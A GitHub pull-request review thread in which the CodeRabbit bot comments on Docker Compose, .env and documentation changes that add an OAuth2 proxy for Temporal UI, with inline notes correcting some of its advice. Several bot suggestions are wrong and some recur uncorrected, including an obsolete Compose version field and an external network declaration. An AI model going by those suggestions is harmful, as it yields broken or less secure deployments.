90-90: Ensure newline at end of file.
Add a newline to satisfy POSIX standards and suppress end-of-file lint warnings.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 90-90: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between e9f7ae4 and 2f3f07b.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)
[warning] 17-17: wrong indentation: expected 4 but found 6 (indentation)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 60-60: trailing spaces (trailing-spaces)
[error] 90-90: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
docker-compose.prod.yml (1)

45-45: Verify OAUTH2_PROXY_COOKIE_SECURE setting.
In a production HTTPS environment, OAUTH2_PROXY_COOKIE_SECURE=false will send cookies over plain HTTP. Consider setting it to true to enforce secure-only cookies.

Can you confirm the proxy is always behind TLS and adjust this flag if necessary?

… settings

Modified the docker-compose.prod.yml to enable SSL by changing the OAUTH2_PROXY_HTTP_ADDRESS to port 443, added SSL certificate settings, and enforced secure cookie settings for production. Updated healthcheck to use HTTPS.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

♻️ Duplicate comments (2)
docker-compose.prod.yml (2)

1-1: Add top-level version declaration
It's best practice to specify a top-level version field to ensure consistent behavior across Compose versions.

+version: "3.8"
 services:
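Review bot: the added `version: "3.8"` line should not be applied. Compose v2 ignores the top-level `version` attribute and prints a warning that it is obsolete whenever it is present, and a file that starts directly at `services:` is the current Compose Specification form, so the original already matches tooling expectations.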

13-14: ⚠️ Potential issue

Fix indentation of the n8n volume mount
The volume list item is indented 8 spaces but should be 6 spaces under volumes: to form a valid YAML sequence.

-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools
🪛 YAMLlint (1.35.1)
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)

🧹 Nitpick comments (4)
docker-compose.prod.yml (4)

11-11: Quote environment values containing spaces
Unquoted spaces in list-item syntax can lead to parsing ambiguities. Wrap the scopes in quotes for clarity.

-      - N8N_GOOGLE_SCOPES=email profile
+      - N8N_GOOGLE_SCOPES="email profile"
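Review bot: the `+` line puts literal quote characters into the variable. In the list form of `environment:`, `- N8N_GOOGLE_SCOPES="email profile"` is one plain YAML scalar, so the container receives the value `"email profile"` with the double quotes included, which a scope parser will not accept. A space inside a plain scalar is already valid YAML, so the original `- N8N_GOOGLE_SCOPES=email profile` needs no change; if quoting is wanted for readability, quote the whole item (`- "N8N_GOOGLE_SCOPES=email profile"`) or switch to the map form (`N8N_GOOGLE_SCOPES: email profile`).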

29-31: Use Docker secrets for sensitive credentials
Keeping OAUTH2_PROXY_CLIENT_SECRET and OAUTH2_PROXY_COOKIE_SECRET in plain environment vars can expose them in process listings or logs. Consider leveraging Docker secrets for secure handling:

secrets:
  oauth2_client_secret:
    file: ./secrets/oauth2_client_secret.txt
  oauth2_cookie_secret:
    file: ./secrets/oauth2_cookie_secret.txt

services:
  oauth2-proxy:
    secrets:
      - oauth2_client_secret
      - oauth2_cookie_secret
    environment:
      - OAUTH2_PROXY_CLIENT_SECRET_FILE=/run/secrets/oauth2_client_secret
      - OAUTH2_PROXY_COOKIE_SECRET_FILE=/run/secrets/oauth2_cookie_secret

Also applies to: 41-41

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 31-31: trailing spaces (trailing-spaces)


31-64: Remove trailing whitespace from blank lines
Blank lines at 31, 34, 42, 50, 57, 61, and 64 contain trailing spaces. Trim these to avoid YAML parsing warnings.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 61-61: trailing spaces (trailing-spaces)
[error] 64-64: trailing spaces (trailing-spaces)


96-96: Ensure newline at end of file
Add a final newline character to conform with POSIX standards and prevent parser errors.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 96-96: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 2f3f07b and 03ff33d.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[warning] 14-14: wrong indentation: expected 6 but found 8 (indentation)
[error] 31-31: trailing spaces (trailing-spaces)
[error] 34-34: trailing spaces (trailing-spaces)
[error] 42-42: trailing spaces (trailing-spaces)
[error] 50-50: trailing spaces (trailing-spaces)
[error] 57-57: trailing spaces (trailing-spaces)
[error] 61-61: trailing spaces (trailing-spaces)
[error] 64-64: trailing spaces (trailing-spaces)
[warning] 68-68: wrong indentation: expected 6 but found 8 (indentation)
[error] 96-96: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

…ration

Modified docker-compose.prod.yml to update the SSL certificate and key paths for both n8n and oauth2-proxy services, ensuring they point to the correct Let's Encrypt certificates. This change enhances the security and functionality of the production environment.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

🧹 Nitpick comments (3)
docker-compose.prod.yml (3)

1-1: Add an explicit Compose version declaration
Including a top-level version field helps ensure consistent behavior across different Docker Compose versions and tooling.
Apply this diff:

+version: "3.8"
 services:

32-65: Remove trailing whitespace on blank lines
YAMLLint flagged trailing spaces on several blank lines within the environment blocks. Please trim these lines to eliminate extraneous spaces, for example:

-      <blank line with spaces>
+      
🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)


98-98: Ensure newline at end of file
Add a trailing newline to satisfy POSIX conventions and YAMLLint’s new-line-at-end-of-file rule.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 03ff33d and ce21895.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (2)
docker-compose.prod.yml (2)

71-75: Verify the healthcheck command availability
The healthcheck uses wget, which may not be present in the quay.io/oauth2-proxy/oauth2-proxy:v7.8.0 image. Ensure wget exists in the container, or consider switching to curl or another tool bundled in the image.


80-87: Confirm usage of declared named volumes
You’ve declared the n8n_data, opensearch-data, and postgresql-data volumes, but the n8n service only mounts SSL certificates. If you intended to persist n8n state, you’ll need to mount n8n_data (e.g., /home/node/.n8n). Otherwise, consider removing unused volume declarations.

Modified docker-compose.prod.yml to change the OAUTH2_PROXY_HTTP_ADDRESS and service port from 443 to 8080, ensuring compatibility with the updated service configuration. This change aligns with the current production environment setup.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 2

♻️ Duplicate comments (1)
docker-compose.prod.yml (1)

1-2: Add a top-level version field to anchor Compose schema
It's best practice to specify a Compose file version to ensure predictable behavior across environments.

Consider prepending:

version: "3.8"
services:
  ...
🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

28-50: Trim trailing whitespace and excess blank lines in env blocks
There are several blank lines with trailing spaces in the OAuth2 Proxy environment section (e.g., around lines 32, 35, 43, 51). Removing them will eliminate linter warnings and improve readability.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)


80-98: Remove trailing spaces and add a newline at EOF
YAMLlint flagged trailing spaces (e.g., line 98) and the lack of a newline at the end of the file. Please trim all trailing whitespace and ensure a single newline character terminates the file.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between ce21895 and 96a1df2.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (2)
docker-compose.prod.yml (2)

17-27: OAuth2 Proxy basic service configuration looks solid
Container name, image, restart policy, dependencies, .env loading, and port mapping are all correctly specified.


59-67: Verify TLS configuration and healthcheck port alignment
You’ve provided OAUTH2_PROXY_SSL_CERT and OAUTH2_PROXY_SSL_KEY for TLS, but the service is bound via OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080. Confirm whether the proxy is indeed serving HTTPS on port 8080 or if you need to use OAUTH2_PROXY_HTTPS_ADDRESS for port 443. Then update the healthcheck URL accordingly.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)

…ign-out URLs

Modified docker-compose.prod.yml to change the OAUTH2_PROXY_REDIRECT_URL and OAUTH2_PROXY_SIGN_OUT_URL to use HTTP and port 8080, ensuring compatibility with the current service setup. This update aligns with the recent changes in the production environment.
…tion configuration

Modified docker-compose.prod.yml to adjust the OAUTH2_PROXY_REDIRECT_URL, ensuring it includes the port 8080 for the OAuth2 callback. This change aligns with the current service setup and maintains consistency with recent updates.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

♻️ Duplicate comments (2)
docker-compose.prod.yml (2)

77-79: ⚠️ Potential issue

Define app-network at the root level.

You attach oauth2-proxy to app-network, but there's no top-level networks: declaration, causing Compose to fail.
Add at the bottom:

 volumes:
   …
+networks:
+  app-network:
+    external: true
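Review bot: `external: true` on the `+` lines tells Compose that the network already exists and must never be created by this file, so on a fresh host `docker compose up` stops with "network app-network declared as external, but could not be found". If `app-network` is defined in the base docker-compose.yml, as the earlier comment in this thread asks to verify, the production override needs no `networks:` block at all, because `-f docker-compose.yml -f docker-compose.prod.yml` merges the top-level definitions; declare it external only when something outside Compose creates the network.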

2-16: 🛠️ Refactor suggestion

Add restart policy and network for n8n service.

The n8n service currently lacks a restart policy for resiliency and isn't attached to the shared app-network, which likely breaks inter-service communication with the OAuth2 proxy.
Consider:

 services:
   n8n:
+  restart: unless-stopped
+  networks:
+    - app-network
     environment:
       - N8N_HOST=n8n.speedandfunction.com
       …
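Review bot: the two `+` lines are indented two spaces, level with `n8n:`, while the `environment:` key below them sits at four. Applied literally, `restart` and `networks` become keys of `services`, that is, bogus service names, and `docker compose config` rejects the file. Indent both to four spaces so they belong to `n8n`; the repeat of this suggestion further down in the thread shows the correct placement.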
🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

1-1: Specify Docker Compose version.

It's best practice to declare a top-level version field for consistent behavior across environments.
Add this at the top:

+version: "3.8"
 services:

32-65: Remove trailing spaces and ensure EOF newline.

Static analysis reports trailing spaces on lines 32, 35, 43, 51, 58, 62, 65 and a missing newline at EOF. Cleaning these up will improve readability and prevent CI warnings.

-      # Email validation settings␣
+      # Email validation settings
...
-  postgresql-data:␣
+  postgresql-data:
+

Also applies to: 98-98

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 96a1df2 and f4feec9.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
docker-compose.prod.yml (1)

41-42: Verify consistency of redirect and sign-out URLs.

The OAUTH2_PROXY_REDIRECT_URL omits the port while the OAUTH2_PROXY_SIGN_OUT_URL includes :8080. This mismatch can lead to callback failures. Ensure both URLs match your external routing. For example:

-      - OAUTH2_PROXY_REDIRECT_URL=${OAUTH2_PROXY_REDIRECT_URL:-http://temporal.speedandfunction.com/oauth2/callback}
+      - OAUTH2_PROXY_REDIRECT_URL=${OAUTH2_PROXY_REDIRECT_URL:-http://temporal.speedandfunction.com:8080/oauth2/callback}

-      - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com:8080/oauth2/sign_out
+      - OAUTH2_PROXY_SIGN_OUT_URL=${OAUTH2_PROXY_SIGN_OUT_URL:-http://temporal.speedandfunction.com:8080/oauth2/sign_out}
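Review bot: both `+` lines keep an `http://` scheme on a public hostname, and that is the larger problem than the port. Google's OAuth client registration rejects non-HTTPS redirect URIs for anything other than localhost, and the authorization code in the callback would travel in clear text, so the callback fails validation whichever port is chosen. Settle the external origin first (the TLS commit in this thread already mounts Let's Encrypt certificates), then make the redirect URL, the sign-out URL and `OAUTH2_PROXY_COOKIE_SECURE` agree with that single `https://` origin; templating the sign-out default from `.env` as the second `+` line does is fine on its own.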

Also applies to: 67-67


@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

♻️ Duplicate comments (1)
docker-compose.prod.yml (1)

72-79: 🛠️ Refactor suggestion

Declare app-network at root level
You attach services to app-network but haven’t defined it. Compose will error out. Add this at the bottom of the file to declare it as an external network:

 volumes:
   postgresql-data:
     driver_opts:
       device: /data/postgresql
+networks:
+  app-network:
+    external: true
🧹 Nitpick comments (7)
docker-compose.prod.yml (7)

1-1: Add Docker Compose version declaration
It’s best practice to specify a top-level version field (e.g. "3.8") to ensure consistent behavior across environments.

Apply this diff at the top:

+version: "3.8"
 services:

2-16: Add resilience and network scoping for n8n
In production, the n8n service should include a restart policy and be attached to the shared app-network to recover from failures and communicate securely with other services.

 services:
   n8n:
+    restart: unless-stopped
+    networks:
+      - app-network
     environment:
       - N8N_HOST=n8n.speedandfunction.com
       ...

24-27: Limit exposed ports if possible
Currently binding 8080:8080 on all interfaces. If the OAuth2 proxy should only be accessible internally, consider binding to 127.0.0.1:8080:8080 or using firewall rules to reduce the attack surface.


64-64: Reduce debug verbosity in prod
OAUTH2_PROXY_SHOW_DEBUG_ON_ERROR=true can leak sensitive info in production logs. Consider disabling it or switching to false for live environments.


68-71: Architectural note on SSL cert mounts
Bind-mounting Let’s Encrypt certs works, but ensure rotation via Certbot hooks won’t disrupt the running container. Alternatively, consider using a Docker-managed volume or secrets mechanism for smoother updates.


32-32: Strip trailing spaces
Several blank/comment lines have trailing spaces which can trigger YAML parsing warnings. Please remove them.

Also applies to: 35-35, 43-43, 51-51, 58-58, 62-62, 65-65

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 32-32: trailing spaces (trailing-spaces)


98-98: Add newline at end of file
POSIX standards recommend a trailing newline to prevent parser warnings and version control mismatches.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f4feec9 and 4c73330.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

🔇 Additional comments (2)
docker-compose.prod.yml (2)

17-23: oauth2-proxy basic setup looks solid
The container name, image, restart policy, and depends_on: temporal-ui are correctly configured for production.


37-38: Confirm cookie and whitelist domains
You’re using .temporal.speedandfunction.com—verify this matches your actual domain hierarchy. If you need to cover multiple subdomains, you may want .speedandfunction.com instead.

…m redirect and sign-out URLs

Modified docker-compose.prod.yml to remove port 8080 from the OAUTH2_PROXY_REDIRECT_URL and OAUTH2_PROXY_SIGN_OUT_URL, ensuring they align with the current service setup. Updated healthcheck to reflect the change in the service address.

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 2

♻️ Duplicate comments (2)
docker-compose.prod.yml (2)

1-1: Declare a Compose file version
It's best practice to specify a top-level version field (e.g., version: "3.8") to ensure consistent behavior across Docker Compose versions.


77-79: Declare the app-network at the bottom
You attach services to app-network, but there's no root networks: block. Either mark it as external or define it:

 volumes:
   …
 networks:
   app-network:
     external: true
🧹 Nitpick comments (5)
docker-compose.prod.yml (5)

2-15: Add a restart policy and network to the n8n service
To improve resilience, ensure n8n restarts on failure and can communicate over the same user-defined network as other services.

Apply this diff:

 services:
   n8n:
+    restart: unless-stopped
     environment:
       - N8N_HOST=n8n.speedandfunction.com
@@
     volumes:
       - /etc/letsencrypt/live/n8n.speedandfunction.com/fullchain.pem:/home/node/certs/n8n.fullchain.pem:ro
       - /etc/letsencrypt/live/n8n.speedandfunction.com/privkey.pem:/home/node/certs/n8n.privkey.pem:ro
+    networks:
+      - app-network

71-72: Use a more reliable healthcheck command
The oauth2-proxy image may not include wget. Consider using curl or a shell‐based test.

-    healthcheck:
-      test: ["CMD", "wget", "-O", "/dev/null", "-q", "http://localhost/oauth2/health"]
+    healthcheck:
+      test: ["CMD-SHELL", "curl -f http://localhost/oauth2/health || exit 1"]
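Review bot: switching from `wget` to `CMD-SHELL ... curl` only helps if the image ships both `/bin/sh` and `curl`; an image minimal enough to lack `wget` usually lacks those too, and then the healthcheck fails for a different reason while the container stays unhealthy. Verify before adopting it with `docker run --rm --entrypoint /bin/sh quay.io/oauth2-proxy/oauth2-proxy:v7.8.0 -c 'command -v curl; command -v wget'`; if that cannot even start a shell, the answer is no, and the options are an alpine variant of the tag if the registry offers one, or probing the proxy from the host or a sidecar instead. Also settle the path: the other suggestion in this thread probes `/oauth2/healthz` while this one probes `/oauth2/health`; oauth2-proxy's documented liveness endpoint is its ping path, `/ping` by default.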

80-98: Unify volume naming conventions
You mix underscores (n8n_data) and hyphens (opensearch-data, postgresql-data). For consistency and readability, pick one style across all declared volumes.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)


32-65: Remove trailing whitespace on blank lines
Several blank separators under environment: contain spaces that trigger YAML lint errors. Removing the trailing spaces will prevent parsing issues.

Example diff for one occurrence (apply similarly at lines 32,35,43,51,58,62,65):

-      # Email validation settings␣␣␣
+      # Email validation settings
🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)


98-98: Add a newline at end-of-file
Ensure the file ends with a single newline character to satisfy POSIX conventions and avoid lint warnings.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 4c73330 and 789753d.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 32-32: trailing spaces (trailing-spaces)
[error] 35-35: trailing spaces (trailing-spaces)
[error] 43-43: trailing spaces (trailing-spaces)
[error] 51-51: trailing spaces (trailing-spaces)
[error] 58-58: trailing spaces (trailing-spaces)
[error] 62-62: trailing spaces (trailing-spaces)
[error] 65-65: trailing spaces (trailing-spaces)
[error] 98-98: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

…iguration

Modified docker-compose.prod.yml to set OAUTH2_PROXY_COOKIE_SECURE and OAUTH2_PROXY_CSRF_COOKIE_SECURE to false, adjusting the security settings for cookies in the production environment. This change may be necessary for compatibility with the current service setup.
@anatolyshipitz changed the title from "feat: implement OAuth2 proxy documentation for Temporal UI authentica…" to "feat: implement OAuth2 proxy for Temporal UI authentication" on Apr 26, 2025
Updated the OAuth2 Proxy setup guide to clarify the configuration process for Google OAuth in production. Simplified the prerequisites, enhanced the Google OAuth setup instructions, and revised the environment configuration section to reflect the new variable names and structure. Removed outdated Docker Compose setup details for improved clarity.
Expanded the environment configuration section in the OAuth2 Proxy setup guide to include additional settings for cookie and CSRF protection, as well as debug and sign-out options. Updated the note for production and development setups, ensuring clarity on variable usage and domain adjustments.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

🧹 Nitpick comments (4)
docs/oauth2-proxy.md (4)

29-29: Document multiple email domain support
Specify that OAUTH2_PROXY_EMAIL_DOMAINS accepts a comma-separated list (e.g., domain1.com,domain2.com) when you need to restrict access to multiple domains.


29-37: Unify placeholder domain syntax
The guide currently alternates between yourdomain.com and <your-domain>. Standardize to a single placeholder format (for example, <your-domain.com>) throughout to avoid confusion.


58-61: Add a Docker Compose service example
Embedding a full oauth2-proxy service snippet (including env_file and health check) will streamline adoption. For instance:

+### Docker Compose Service Example
+```yaml
+services:
+  oauth2-proxy:
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.4.0
+    env_file:
+      - .env
+    ports:
+      - "8080:8080"
+    depends_on:
+      - temporal-ui
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://localhost:8080/oauth2/healthz"]
+      interval: 30s
+      timeout: 10s
+      retries: 3
+```
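Review bot: `env_file: - .env` in this snippet hands the whole project .env to the oauth2-proxy container, the same file that supplies POSTGRES_PASSWORD and N8N_ENCRYPTION_KEY to the other services; pass only the OAUTH2_PROXY_* variables via `environment:` or a dedicated env file so the proxy holds nothing beyond its own credentials. The image tag v7.4.0 also disagrees with the v7.8.0 used in docker-compose.prod.yml, and the curl healthcheck assumes a binary that the default oauth2-proxy image (distroless, no shell, curl or wget) does not carry; keep one version and check for the binary in the pinned image before relying on an in-container probe.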

60-61: Clarify enabling OAuth2 Proxy in development
The note mentions that OAuth2 Proxy isn’t enabled by default in dev. Please include a brief snippet or instructions showing how to add the oauth2-proxy service (with env_file: .env) to a docker-compose.dev.yml or local setup.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6b9471d and 1df277d.

📒 Files selected for processing (1)
  • docs/oauth2-proxy.md (1 hunks)
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

…emporal-ui service

Modified the healthcheck URL in docker-compose.yml to replace the hardcoded port with a dynamic variable, ensuring it reflects the correct service port defined by TEMPORAL_UI_PORT. This change enhances flexibility and aligns with the current service configuration.
Revised the Docker Compose section in README.md to simplify the production setup instructions. Removed the detailed explanation of using the COMPOSE_FILE environment variable and focused on the -f flag method for clarity. This change enhances the readability and usability of the documentation.
…tup script

Updated .env.example to include new environment variables for OAuth2 Proxy and n8n. Modified docker-compose files to utilize these variables, ensuring dynamic port assignments and improved service configurations. Removed the setup_volumes.sh script and streamlined README.md to reflect these changes, enhancing clarity and usability for users.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 4

🧹 Nitpick comments (8)
.env.example (1)

21-25: Include Sign-Out URL Placeholder & Clarify Domain

  • .env.example defines OAUTH2_PROXY_REDIRECT_URL but omits OAUTH2_PROXY_SIGN_OUT_URL, which is hard-coded in docker-compose.prod.yml. Consider exposing it so users can override sign-out behavior.
  • Also, replace the your-domain placeholder with guidance (e.g., temporal.speedandfunction.com) to match your documented production host.

Suggested diff:

 # OAuth2 Proxy / Google OAuth
 GOOGLE_CLIENT_ID=your_google_client_id
 GOOGLE_CLIENT_SECRET=your_google_client_secret
 OAUTH2_PROXY_COOKIE_SECRET=your_random_cookie_secret
-OAUTH2_PROXY_REDIRECT_URL=https://your-domain/oauth2/callback
+OAUTH2_PROXY_REDIRECT_URL=https://your-domain/oauth2/callback
+OAUTH2_PROXY_SIGN_OUT_URL=https://your-domain/oauth2/sign_out
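Review bot: the `-`/`+` pair for OAUTH2_PROXY_REDIRECT_URL is a no-op, both lines are identical, so this diff does not apply the domain guidance the comment asks for. More important in the same block: `OAUTH2_PROXY_COOKIE_SECRET=your_random_cookie_secret` is 25 bytes and oauth2-proxy rejects it, since it needs a 16, 24 or 32 byte key given raw or as URL-safe base64. Document generating it with `openssl rand -base64 32 | tr -- '+/' '-_'` instead of shipping a string that someone may leave in place.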
README.md (3)

40-45: Standardize Docker CLI Usage
The development section uses docker compose, but the production command (docker-compose -f …) uses the hyphenated form. To avoid confusion, pick one style—docker compose is recommended for the latest Docker CLI.


49-49: Align Production Command with New CLI

-docker-compose -f docker-compose.yml -f docker-compose.prod.yml up -d
+docker compose -f docker-compose.yml -f docker-compose.prod.yml up -d

63-63: Consider --pull on Rebuild
You’ve consolidated build and up into one command—nice! For production you might add --pull to ensure you fetch the latest base images:

docker compose up --build --pull --force-recreate -d
docker-compose.prod.yml (4)

1-2: Add top-level version declaration
Include a Compose version (e.g., version: "3.8") at the top to lock in behavior across CLI versions.


27-34: Pin OAuth2-Proxy Image to a Digest
Relying on a mutable tag can introduce supply-chain risks. Pin to a SHA256 digest you’ve audited:

-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest>
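Review bot: a bare `@sha256:<digest>` reference drops the human-readable version from the compose file; the `quay.io/oauth2-proxy/oauth2-proxy:v7.8.0@sha256:<digest>` form keeps both, and the daemon resolves by digest while ignoring the tag. Record how the digest was obtained (`docker buildx imagetools inspect quay.io/oauth2-proxy/oauth2-proxy:v7.8.0` prints the manifest-list digest) and make sure whatever bumps the version also bumps the digest, otherwise the pin silently freezes the proxy on an old release.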

75-82: Healthcheck & Network Hygiene

  • Consider using curl instead of wget for the healthcheck to align with common Docker images.
  • Ensure the app-network definition is applied (see earlier comment).

11-101: Clean Up Trailing Spaces & Add EOF Newline
YAMLLint reports trailing spaces on multiple lines and a missing newline at EOF. Removing these will prevent parsing warnings.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 11-11, 42-42, 45-45, 53-53, 61-61, 68-68, 71-71: trailing spaces (trailing-spaces)
[error] 101-101: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 8c86686 and 5697b99.

📒 Files selected for processing (5)
  • .env.example (2 hunks)
  • README.md (2 hunks)
